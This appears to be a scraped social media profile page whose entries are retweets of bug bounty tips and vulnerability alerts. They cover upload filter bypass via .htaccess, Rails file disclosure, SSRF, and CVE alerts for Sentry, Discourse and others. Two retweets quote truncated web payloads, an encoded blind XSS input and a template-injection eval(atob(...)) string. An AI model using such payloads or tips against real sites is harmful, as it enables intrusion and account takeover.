Foody
@HuobiTurkiye
Followers
6
Following
20
Statuses
64
Joined June 2022
RT @chux13786509: Works like a charm (again!) 🔥 Even with a good blacklist of PHP extensions, sometimes they just forget about .htaccess fi…
0
48
0
RT @artsploit: Last year, I committed to uncovering critical vulnerabilities in Maven repositories. Now it’s time to share the findings: RC…
0
83
0
RT @nav1n0x: If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it…
0
199
0
RT @HunterMapping: 🚨Alert🚨 CVE-2025-22146 (CVSS 9.1): Critical Sentry Vulnerability Allowed Account Takeovers 📊 174k+ Services are found on…
0
16
0
RT @HunterMapping: 🚨Alert🚨 CVE-2024-12084(CVSS 9.8) : Heap overflow that could lead to remote code execution 📊 52M+ Services are found on t…
0
29
0
RT @GodfatherOrwa: Hello everyone ♥ a little bit write-up of #bugbountytip #bugbountytips I am going to write here ..... Title: getting u…
0
275
0
RT @coffinxp7: this extension is amazing find some thumbnails endpoint and just one directory back and access full database including sensi…
0
55
0
RT @infosec_au: Some security advisories don't get the attention they deserve. Being a True Attack Surface Management solution, @assetnote…
0
24
0
RT @wgujjer11: Find Git Secrets and Api keys Using TRufflehog Video Link : #bugbounty #hacking #cybersecurity #e…
0
25
0
RT @Yaseen11211: #bugbountytips Blind XSS in Private Target Payload used : %22%3E%3Cinput%20onfocus%3Deval%28atob%2…
0
26
0
RT @annonimous254z: ~Another area to test for SSRF Check out also my new video on why you are not finding bugs 👀 #…
0
28
0
RT @AMakki1337: 🚨 Just discovered a critical CVE in @discourse allowing account takeover without any user interaction! 💀🔥 This software p…
0
2
0
RT @akaclandestine: GitHub - whitel1st/docem: A tool to embed XXE and XSS payloads in docx, odt, pptx, xlsx files (oxml_xxe on steroids) ht…
0
27
0
RT @intigriti: We all have come across a login panel with no signups before... But do you also test for commonly used passwords & default…
0
10
0
RT @infoscresearchr: Security Tweet - Day 102 Use uncover to find third degree subdomains uncover -q 'org:"DoD Network Information Center…
0
19
0
RT @Yaseen11211: Another hit! #bugbountytips Payload used : {{constructor.constructor('eval(atob(\'dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudC…
0
60
0